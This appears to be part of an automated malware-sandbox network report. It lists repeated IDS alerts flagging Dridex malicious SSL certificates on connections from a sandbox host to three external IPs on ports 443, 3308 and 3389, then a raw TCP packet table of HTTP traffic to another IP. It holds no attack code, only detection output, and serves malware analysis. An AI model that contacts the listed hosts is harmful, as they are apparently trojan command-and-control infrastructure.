01/12/21-01:44:55.105278	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49267	5.100.228.233	192.168.2.22
01/12/21-01:44:56.163308	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49269	77.220.64.37	192.168.2.22
01/12/21-01:44:56.687833	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49270	80.86.91.27	192.168.2.22
01/12/21-01:44:57.231482	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49271	5.100.228.233	192.168.2.22
01/12/21-01:44:57.231482	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49271	5.100.228.233	192.168.2.22
01/12/21-01:44:58.286957	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49273	77.220.64.37	192.168.2.22
01/12/21-01:44:58.809666	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49274	80.86.91.27	192.168.2.22
01/12/21-01:44:59.327613	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49275	5.100.228.233	192.168.2.22
01/12/21-01:44:59.327613	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49275	5.100.228.233	192.168.2.22
01/12/21-01:45:00.440152	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49277	77.220.64.37	192.168.2.22
01/12/21-01:45:00.957031	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49278	80.86.91.27	192.168.2.22
01/12/21-01:45:01.454270	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49279	5.100.228.233	192.168.2.22
01/12/21-01:45:01.454270	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49279	5.100.228.233	192.168.2.22
01/12/21-01:45:02.480574	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49281	77.220.64.37	192.168.2.22
01/12/21-01:45:03.007372	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49282	80.86.91.27	192.168.2.22
01/12/21-01:45:03.525800	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49283	5.100.228.233	192.168.2.22
01/12/21-01:45:03.525800	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49283	5.100.228.233	192.168.2.22
01/12/21-01:45:04.587567	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49285	77.220.64.37	192.168.2.22
01/12/21-01:45:05.128540	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49286	80.86.91.27	192.168.2.22
01/12/21-01:45:05.666075	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49287	5.100.228.233	192.168.2.22
01/12/21-01:45:05.666075	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49287	5.100.228.233	192.168.2.22
01/12/21-01:45:06.703485	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49289	77.220.64.37	192.168.2.22
01/12/21-01:45:07.238284	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49290	80.86.91.27	192.168.2.22
01/12/21-01:45:07.771134	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49291	5.100.228.233	192.168.2.22
01/12/21-01:45:07.771134	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49291	5.100.228.233	192.168.2.22
01/12/21-01:45:08.957115	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49293	77.220.64.37	192.168.2.22
01/12/21-01:45:09.805911	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49294	80.86.91.27	192.168.2.22
01/12/21-01:45:10.330021	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49295	5.100.228.233	192.168.2.22
01/12/21-01:45:10.330021	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49295	5.100.228.233	192.168.2.22
01/12/21-01:45:11.386788	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49297	77.220.64.37	192.168.2.22
01/12/21-01:45:11.911558	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49298	80.86.91.27	192.168.2.22
01/12/21-01:45:12.436507	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49299	5.100.228.233	192.168.2.22
01/12/21-01:45:12.436507	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49299	5.100.228.233	192.168.2.22
01/12/21-01:45:13.495340	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49301	77.220.64.37	192.168.2.22
01/12/21-01:45:14.021716	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49302	80.86.91.27	192.168.2.22
01/12/21-01:45:14.555571	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49303	5.100.228.233	192.168.2.22
01/12/21-01:45:14.555571	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49303	5.100.228.233	192.168.2.22
01/12/21-01:45:15.603847	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49305	77.220.64.37	192.168.2.22
01/12/21-01:45:16.126558	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49306	80.86.91.27	192.168.2.22
01/12/21-01:45:16.640695	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49307	5.100.228.233	192.168.2.22
01/12/21-01:45:16.640695	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49307	5.100.228.233	192.168.2.22
01/12/21-01:45:17.696660	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49309	77.220.64.37	192.168.2.22
01/12/21-01:45:18.229357	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49310	80.86.91.27	192.168.2.22
01/12/21-01:45:18.751789	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49311	5.100.228.233	192.168.2.22
01/12/21-01:45:18.751789	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49311	5.100.228.233	192.168.2.22
01/12/21-01:45:19.800482	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49313	77.220.64.37	192.168.2.22
01/12/21-01:45:20.328687	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49314	80.86.91.27	192.168.2.22
01/12/21-01:45:20.857658	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49315	5.100.228.233	192.168.2.22
01/12/21-01:45:20.857658	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49315	5.100.228.233	192.168.2.22
01/12/21-01:45:21.920306	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49317	77.220.64.37	192.168.2.22
01/12/21-01:45:22.439244	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49318	80.86.91.27	192.168.2.22
01/12/21-01:45:22.971524	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49319	5.100.228.233	192.168.2.22
01/12/21-01:45:22.971524	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49319	5.100.228.233	192.168.2.22
01/12/21-01:45:24.042558	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49321	77.220.64.37	192.168.2.22
01/12/21-01:45:24.628506	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49322	80.86.91.27	192.168.2.22
01/12/21-01:45:25.172507	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49323	5.100.228.233	192.168.2.22
01/12/21-01:45:25.172507	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49323	5.100.228.233	192.168.2.22
01/12/21-01:45:26.353761	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49325	77.220.64.37	192.168.2.22
01/12/21-01:45:27.111738	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49326	80.86.91.27	192.168.2.22
01/12/21-01:45:27.730963	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49327	5.100.228.233	192.168.2.22
01/12/21-01:45:27.730963	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49327	5.100.228.233	192.168.2.22
01/12/21-01:45:28.783770	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49329	77.220.64.37	192.168.2.22
01/12/21-01:45:29.304929	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49330	80.86.91.27	192.168.2.22
01/12/21-01:45:29.833595	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49331	5.100.228.233	192.168.2.22
01/12/21-01:45:29.833595	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49331	5.100.228.233	192.168.2.22
01/12/21-01:45:30.906865	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49333	77.220.64.37	192.168.2.22
01/12/21-01:45:31.434784	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49334	80.86.91.27	192.168.2.22
01/12/21-01:45:31.954050	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49335	5.100.228.233	192.168.2.22
01/12/21-01:45:31.954050	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49335	5.100.228.233	192.168.2.22
01/12/21-01:45:33.014613	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49337	77.220.64.37	192.168.2.22
01/12/21-01:45:33.538117	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49338	80.86.91.27	192.168.2.22
01/12/21-01:45:34.066648	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49339	5.100.228.233	192.168.2.22
01/12/21-01:45:34.066648	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49339	5.100.228.233	192.168.2.22
01/12/21-01:45:35.135796	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49341	77.220.64.37	192.168.2.22
01/12/21-01:45:35.659720	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49342	80.86.91.27	192.168.2.22
01/12/21-01:45:36.196982	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49343	5.100.228.233	192.168.2.22
01/12/21-01:45:36.196982	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49343	5.100.228.233	192.168.2.22
01/12/21-01:45:37.273354	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49345	77.220.64.37	192.168.2.22
01/12/21-01:45:37.800934	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49346	80.86.91.27	192.168.2.22
01/12/21-01:45:38.336189	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49347	5.100.228.233	192.168.2.22
01/12/21-01:45:38.336189	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49347	5.100.228.233	192.168.2.22
01/12/21-01:45:39.394809	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49349	77.220.64.37	192.168.2.22
01/12/21-01:45:39.922134	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49350	80.86.91.27	192.168.2.22
01/12/21-01:45:40.450447	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49351	5.100.228.233	192.168.2.22
01/12/21-01:45:40.450447	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49351	5.100.228.233	192.168.2.22
01/12/21-01:45:41.501973	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49353	77.220.64.37	192.168.2.22
01/12/21-01:45:42.028269	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49354	80.86.91.27	192.168.2.22
01/12/21-01:45:42.553434	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49355	5.100.228.233	192.168.2.22
01/12/21-01:45:42.553434	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49355	5.100.228.233	192.168.2.22
01/12/21-01:45:43.740382	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49357	77.220.64.37	192.168.2.22
01/12/21-01:45:44.654204	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49358	80.86.91.27	192.168.2.22
01/12/21-01:45:45.189935	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49359	5.100.228.233	192.168.2.22
01/12/21-01:45:45.189935	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49359	5.100.228.233	192.168.2.22
01/12/21-01:45:45.406566	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49360	5.100.228.233	192.168.2.22
01/12/21-01:45:45.406566	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49360	5.100.228.233	192.168.2.22
01/12/21-01:45:46.466078	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49362	77.220.64.37	192.168.2.22
01/12/21-01:45:46.988915	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49363	80.86.91.27	192.168.2.22
01/12/21-01:45:47.527705	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49364	5.100.228.233	192.168.2.22
01/12/21-01:45:47.527705	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49364	5.100.228.233	192.168.2.22
01/12/21-01:45:48.672018	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49366	77.220.64.37	192.168.2.22
01/12/21-01:45:49.236417	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49367	80.86.91.27	192.168.2.22
01/12/21-01:45:49.820444	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49368	5.100.228.233	192.168.2.22
01/12/21-01:45:49.820444	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49368	5.100.228.233	192.168.2.22
01/12/21-01:45:50.877825	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49370	77.220.64.37	192.168.2.22
01/12/21-01:45:51.402479	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49371	80.86.91.27	192.168.2.22
01/12/21-01:45:51.928769	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49372	5.100.228.233	192.168.2.22
01/12/21-01:45:51.928769	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49372	5.100.228.233	192.168.2.22
01/12/21-01:45:52.970569	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49374	77.220.64.37	192.168.2.22
01/12/21-01:45:53.492621	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49375	80.86.91.27	192.168.2.22
01/12/21-01:45:54.021713	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49376	5.100.228.233	192.168.2.22
01/12/21-01:45:54.021713	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49376	5.100.228.233	192.168.2.22
01/12/21-01:45:55.058488	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49378	77.220.64.37	192.168.2.22
01/12/21-01:45:55.582649	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49379	80.86.91.27	192.168.2.22
01/12/21-01:45:56.123069	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49380	5.100.228.233	192.168.2.22
01/12/21-01:45:56.123069	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49380	5.100.228.233	192.168.2.22
01/12/21-01:45:57.165930	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49382	77.220.64.37	192.168.2.22
01/12/21-01:45:57.705210	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49383	80.86.91.27	192.168.2.22
01/12/21-01:45:58.231600	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49384	5.100.228.233	192.168.2.22
01/12/21-01:45:58.231600	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49384	5.100.228.233	192.168.2.22
01/12/21-01:45:59.286124	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49386	77.220.64.37	192.168.2.22
01/12/21-01:45:59.811323	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49387	80.86.91.27	192.168.2.22
01/12/21-01:46:00.328290	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49388	5.100.228.233	192.168.2.22
01/12/21-01:46:00.328290	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49388	5.100.228.233	192.168.2.22
01/12/21-01:46:01.400849	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49390	77.220.64.37	192.168.2.22
01/12/21-01:46:01.917753	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49391	80.86.91.27	192.168.2.22
01/12/21-01:46:02.452135	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49392	5.100.228.233	192.168.2.22
01/12/21-01:46:02.452135	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49392	5.100.228.233	192.168.2.22
01/12/21-01:46:03.514746	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49394	77.220.64.37	192.168.2.22
01/12/21-01:46:04.034003	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49395	80.86.91.27	192.168.2.22
01/12/21-01:46:04.558184	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49396	5.100.228.233	192.168.2.22
01/12/21-01:46:04.558184	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49396	5.100.228.233	192.168.2.22
01/12/21-01:46:05.621118	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	443	49398	77.220.64.37	192.168.2.22
01/12/21-01:46:06.144329	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3308	49399	80.86.91.27	192.168.2.22
01/12/21-01:46:06.657059	TCP	2023476	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49400	5.100.228.233	192.168.2.22
01/12/21-01:46:06.657059	TCP	2022535	ET TROJAN ABUSE.CH SSL Blacklist Malicious SSL certificate detected (Dridex)	3389	49400	5.100.228.233	192.168.2.22

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 12, 2021 01:43:52.658485889 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:52.850734949 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:52.850863934 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:52.851536036 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049026966 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049108028 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049163103 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049215078 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049264908 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049315929 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049338102 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049355030 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049375057 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049415112 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049454927 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049470901 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049535990 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049562931 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049597979 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.049602985 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.049674988 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.055134058 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.241739035 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.241807938 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.241875887 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.241934061 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.241949081 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.241978884 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.241993904 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.241996050 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242058039 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242070913 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242119074 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242130041 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242183924 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242217064 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242260933 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242288113 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242311954 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242350101 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242371082 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242412090 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.242417097 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.242481947 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.244703054 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.434740067 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.434797049 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.434875011 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.434937000 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.434998989 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435039043 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435059071 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435071945 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435076952 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435120106 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435126066 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435180902 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435185909 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435244083 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435266972 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435322046 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435339928 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435372114 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435390949 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435421944 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435436964 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435471058 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435486078 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435520887 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435535908 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435570955 CET	80	49165	68.65.122.35	192.168.2.22
Jan 12, 2021 01:43:53.435584068 CET	49165	80	192.168.2.22	68.65.122.35
Jan 12, 2021 01:43:53.435621023 CET	80	49165	68.65.122.35	192.168.2.22
